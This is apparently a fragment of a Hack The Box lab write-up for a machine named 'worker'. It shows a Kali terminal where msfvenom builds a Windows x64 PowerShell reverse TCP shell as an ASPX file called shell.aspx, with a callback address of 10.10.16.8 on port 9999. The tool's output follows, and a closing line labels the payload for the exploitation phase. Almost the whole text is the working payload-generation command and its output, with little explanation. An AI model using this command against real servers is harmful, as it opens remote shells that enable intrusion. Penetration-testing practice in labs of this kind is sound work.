msfvenom


┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.16.8 LPORT=9999 -f aspx -o shell.aspx
[-] no platform was selected, choosing msf::Module::Platform::Windows from the payload
[-] no arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
payload size: 1885 bytes
final size of aspx file: 10605 bytes
saved as: shell.aspx

msfvenom generated a reverse shell ASPX payload for the Exploitation phase